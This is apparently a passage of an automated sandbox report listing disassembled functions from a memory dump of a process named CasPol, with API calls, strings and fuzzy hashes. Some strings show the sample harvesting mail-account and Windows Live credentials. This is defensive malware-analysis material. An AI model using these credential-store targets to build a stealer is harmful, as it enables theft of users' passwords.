                                                                                                                                                                                  • Instruction Fuzzy Hash: B201DF31609114BBF7051B61EE46F9FBA6CEF49790F20002AF607B1191DA78AE10969C
                                                                                                                                                                                  Function 0040966C Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                                                                                                                  • _mbscpy.MSVCRT(0045A448,00000000,?,00000000,0040972B,00000000,?,00000000,00000104), ref: 00409686
                                                                                                                                                                                  • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,?,00000000,0040972B,00000000,?,00000000,00000104), ref: 00409696
                                                                                                                                                                                  • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                                                                                                                                                                                    • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: PrivateProfile_mbscpy$AttributesFileString
                                                                                                                                                                                  • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                                                  • API String ID: 888011440-2039793938
                                                                                                                                                                                  • Opcode ID: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                                                                                                                                                                                  • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                                                                                                                                                                                  • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                                                                                                                                                                                  Function 0042E8E8 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 272COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • database %s is already in use, xrefs: 0042E9CE
                                                                                                                                                                                  • database is already attached, xrefs: 0042EA97
                                                                                                                                                                                  • cannot ATTACH database within transaction, xrefs: 0042E966
                                                                                                                                                                                  • unable to open database: %s, xrefs: 0042EBD6
                                                                                                                                                                                  • out of memory, xrefs: 0042EBEF
                                                                                                                                                                                  • attached databases must use the same text encoding as main database, xrefs: 0042EAE6
                                                                                                                                                                                  • too many attached databases - max %d, xrefs: 0042E951
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpymemset
                                                                                                                                                                                  • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                                                                                  • API String ID: 1297977491-2001300268
                                                                                                                                                                                  • Opcode ID: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                                                                                                                                                                  • Instruction ID: 706ac67067754653a22c48b2dfc2d31ecc94a00d4abf430cd75191e688397775
                                                                                                                                                                                  • Opcode Fuzzy Hash: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                                                                                                                                                                  • Instruction Fuzzy Hash: E5A1BFB16083119FD720DF26E441B1BBBE0BF84314F54491FF8998B252D778E989CB5A
                                                                                                                                                                                  Function 00409C1C Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 157COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A3E
                                                                                                                                                                                    • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A4C
                                                                                                                                                                                    • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A5D
                                                                                                                                                                                    • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A74
                                                                                                                                                                                    • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A7D
                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 00409C53
                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 00409C6F
                                                                                                                                                                                  • memcpy.MSVCRT(?,0wE,00000014), ref: 00409C97
                                                                                                                                                                                  • memcpy.MSVCRT(?,0wE,00000010,?,0wE,00000014), ref: 00409CB4
                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 00409D3D
                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 00409D47
                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 00409D7F
                                                                                                                                                                                    • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                                                                                                                    • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                                                                                                                                    • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                                                                                                                                    • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ??2@??3@$memcpy$LoadString_mbscpystrlen
                                                                                                                                                                                  • String ID: 0wE$d
                                                                                                                                                                                  • API String ID: 2915808112-1552800882
                                                                                                                                                                                  • Opcode ID: 5a88f189346dd5be2aec3c73a416be20eab0e6d765e6f29cccd2d89947c5fd10
                                                                                                                                                                                  • Instruction ID: 1be057752684aea17f507b8882d339e9c418a93e0b7bc1648df0d3b0eb18cc96
                                                                                                                                                                                  • Opcode Fuzzy Hash: 5a88f189346dd5be2aec3c73a416be20eab0e6d765e6f29cccd2d89947c5fd10
                                                                                                                                                                                  • Instruction Fuzzy Hash: B4513B71A01704AFEB24DF29D542B9AB7E4FF88314F10852EE55ADB382DB74E940CB44
                                                                                                                                                                                  Function 00403166 Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 100stringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                                                                                                                                                  • strchr.MSVCRT ref: 0040327B
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: PrivateProfileStringstrchr
                                                                                                                                                                                  • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                                                                                                                                  • API String ID: 1348940319-1729847305
                                                                                                                                                                                  • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                                                                                                                  • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                                                                                                                                                                  • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                                                                                                                                                                  Function 00411004 Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 60COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,0040ABBD,?,?), ref: 00411034
                                                                                                                                                                                  • memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,0040ABBD,?,?), ref: 0041105A
                                                                                                                                                                                  • memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpy
                                                                                                                                                                                  • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                                                  • API String ID: 3510742995-3273207271
                                                                                                                                                                                  • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                                                                                                  • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                                                                                                                                                                  • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                                                                                                  • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                                                                                                                                                                  Function 00405E69 Relevance: 13.6, APIs: 9, Instructions: 58windowCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 00405E80
                                                                                                                                                                                  • GetWindow.USER32(?,00000005), ref: 00405E98
                                                                                                                                                                                  • GetWindow.USER32(00000000), ref: 00405E9B
                                                                                                                                                                                    • Part of subcall function 004015B0: GetWindowRect.USER32(?,?), ref: 004015BF
                                                                                                                                                                                    • Part of subcall function 004015B0: MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004015DA
                                                                                                                                                                                  • GetWindow.USER32(00000000,00000002), ref: 00405EA7
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003ED), ref: 00405EBE
                                                                                                                                                                                  • GetDlgItem.USER32(?,00000000), ref: 00405ED0
                                                                                                                                                                                  • GetDlgItem.USER32(?,00000000), ref: 00405EE2
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003ED), ref: 00405EF0
                                                                                                                                                                                  • SetFocus.USER32(00000000), ref: 00405EF3
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Window$Item$Rect$ClientFocusPoints
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2432066023-0
                                                                                                                                                                                  • Opcode ID: 3ed905a81be40d412dce536e6719fe7cdedab364c991d1c90f2ea44b29e4445c
                                                                                                                                                                                  • Instruction ID: 6786727c0aa7fef6bca0c81d499308ec00879f235530f9e7c86c655f771e1d73
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3ed905a81be40d412dce536e6719fe7cdedab364c991d1c90f2ea44b29e4445c
                                                                                                                                                                                  • Instruction Fuzzy Hash: B801A571500305EFDB116F76DC8AF6BBFACEF81755F05442AB4049B191CBB8E8018A28
                                                                                                                                                                                  Function 0040F96C Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 133COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                                                                                                                  • memset.MSVCRT ref: 0040FA1E
                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040FA35
                                                                                                                                                                                  • _strnicmp.MSVCRT ref: 0040FA4F
                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA7B
                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA9B
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                                                                                                                                                                  • String ID: WindowsLive:name=*$windowslive:name=
                                                                                                                                                                                  • API String ID: 945165440-3589380929
                                                                                                                                                                                  • Opcode ID: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                                                                                                                                                  • Instruction ID: 67e4bc7d9cc92e77f49167b45697c8bd07ba2e516c4687fa62adfbc1007618b4
                                                                                                                                                                                  • Opcode Fuzzy Hash: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                                                                                                                                                  • Instruction Fuzzy Hash: D1418BB1508345AFC720DF24D88496BB7ECEB85304F004A3EF99AA3691D738DD48CB66
                                                                                                                                                                                  Function 004094A2 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 004094C8
                                                                                                                                                                                  • GetDlgCtrlID.USER32(?), ref: 004094D3
                                                                                                                                                                                  • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                                                                                                                                                                  • memset.MSVCRT ref: 0040950C
                                                                                                                                                                                  • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                                                                                                                                                                  • _strcmpi.MSVCRT ref: 00409531
                                                                                                                                                                                    • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                                                                                                                                                  • String ID: sysdatetimepick32
                                                                                                                                                                                  • API String ID: 3411445237-4169760276
                                                                                                                                                                                  • Opcode ID: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                                                                                                                                                                  • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                                                                                                                                                                                  • Opcode Fuzzy Hash: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                                                                                                                                                                                  Function 00405983 Relevance: 12.2, APIs: 8, Instructions: 200windowCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405A31
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405A47
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405A5F
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405A7A
                                                                                                                                                                                  • EndDialog.USER32(?,00000002), ref: 00405A96
                                                                                                                                                                                  • EndDialog.USER32(?,00000001), ref: 00405AA9
                                                                                                                                                                                    • Part of subcall function 00405737: GetDlgItem.USER32(?,000003E9), ref: 00405745
                                                                                                                                                                                    • Part of subcall function 00405737: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 0040575A
                                                                                                                                                                                    • Part of subcall function 00405737: SendMessageA.USER32(?,00001032,00000000,00000000), ref: 00405776
                                                                                                                                                                                  • SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405AC1
                                                                                                                                                                                  • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405BC9
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Item$DialogMessageSend
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2485852401-0
                                                                                                                                                                                  • Opcode ID: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
                                                                                                                                                                                  • Instruction ID: 49f8b46d81ffaaf96d74304be2fa091063820ac2067ea90d1efd1f4607779086
                                                                                                                                                                                  • Opcode Fuzzy Hash: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
                                                                                                                                                                                  • Instruction Fuzzy Hash: BC619230600A45ABEB21AF65C8C5A2BB7A5EF40718F04C23BF515A76D1E778EA50CF58
                                                                                                                                                                                  Function 0040B38F Relevance: 12.1, APIs: 8, Instructions: 108windowCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                                                                                                                                                                  • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                                                                                                                                                                  • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                                                                                                                                                                  • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                                                                                                                                                                  • GetSysColor.USER32(0000000F), ref: 0040B472
                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 0040B4A6
                                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                                                                                                                                                                  • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessageSend$DeleteImageLoadObject$Color
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3642520215-0
                                                                                                                                                                                  • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                                                                                                  • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                                                                                                                                                                                  Function 00405BD9 Relevance: 12.1, APIs: 8, Instructions: 100windowCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2313361498-0
                                                                                                                                                                                  • Opcode ID: d40986e2c2ca4a35e85ac25686d3f593c4cb88516650d0cf74e2f7431fc52bd9
                                                                                                                                                                                  • Instruction ID: 76b7db47255e00c5a16d586f34bfaf53fe76d4163934589152c5d70c184cfcdd
                                                                                                                                                                                  • Opcode Fuzzy Hash: d40986e2c2ca4a35e85ac25686d3f593c4cb88516650d0cf74e2f7431fc52bd9
                                                                                                                                                                                  • Instruction Fuzzy Hash: AF31B3B1500605AFEB24AF69CC85E2AF7A8FF44354B00853FF55AE76A1D778EC408B94
                                                                                                                                                                                  Function 0040BB14 Relevance: 12.1, APIs: 8, Instructions: 76COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 0040BB33
                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 0040BB49
                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 0040BB5C
                                                                                                                                                                                  • BeginDeferWindowPos.USER32(00000003), ref: 0040BB79
                                                                                                                                                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040BB96
                                                                                                                                                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040BBB6
                                                                                                                                                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040BBDD
                                                                                                                                                                                  • EndDeferWindowPos.USER32(?), ref: 0040BBE6
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Window$Defer$Rect$BeginClient
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2126104762-0
                                                                                                                                                                                  • Opcode ID: 79eb62364e7a0dcd77e9d411930711777f01ecf57ddd8cbf010404b9f010fc5c
                                                                                                                                                                                  • Instruction ID: 10c9609a041f1aae696d54cc03c31aacdb7ad71aa251d7cd9d71944ddb51ea6f
                                                                                                                                                                                  • Opcode Fuzzy Hash: 79eb62364e7a0dcd77e9d411930711777f01ecf57ddd8cbf010404b9f010fc5c
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4521C376A00209FFDB518FE8DD89FEEBBB9FB08700F144065FA55A2160C771AA519B24
                                                                                                                                                                                  Function 004072D6 Relevance: 12.1, APIs: 8, Instructions: 72COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                                                                                                                                                                  • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                                                                                                                                                                  • GetDC.USER32(00000000), ref: 004072FB
                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,00000008,?,?,?,?,?,?,004012E4,?), ref: 0040730D
                                                                                                                                                                                  • GetDeviceCaps.GDI32(004012E4,0000000A,?,?,?,?,?,?,004012E4,?), ref: 00407316
                                                                                                                                                                                  • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                                                                                                                                                                  • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                                                                                                                                                                  • MoveWindow.USER32(004012E4,?,?,?,?,00000001), ref: 00407371
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1999381814-0
                                                                                                                                                                                  • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                                                                                                  • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                                                                                                                                                                  • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                                                                                                  • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                                                                                                                                                                  Function 004261F7 Relevance: 10.9, APIs: 2, Strings: 5, Instructions: 443COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpymemset
                                                                                                                                                                                  • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                                                                                                                                                  • API String ID: 1297977491-3883738016
                                                                                                                                                                                  • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                                                                                                  • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                                                                                                                                                                  • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                                                                                                  • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                                                                                                                                                                  Function 00449630 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                                                                                                                                                                                    • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                                                                                                                                                                                    • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                                                                                                    • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000040), ref: 0044972E
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044977B
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000040), ref: 004497F6
                                                                                                                                                                                    • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000040,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 00449291
                                                                                                                                                                                    • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000008,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 004492DD
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000000), ref: 00449846
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 00449887
                                                                                                                                                                                  • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 004498B8
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpy$memset
                                                                                                                                                                                  • String ID: gj
                                                                                                                                                                                  • API String ID: 438689982-4203073231
                                                                                                                                                                                  • Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                                                                                                                  • Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
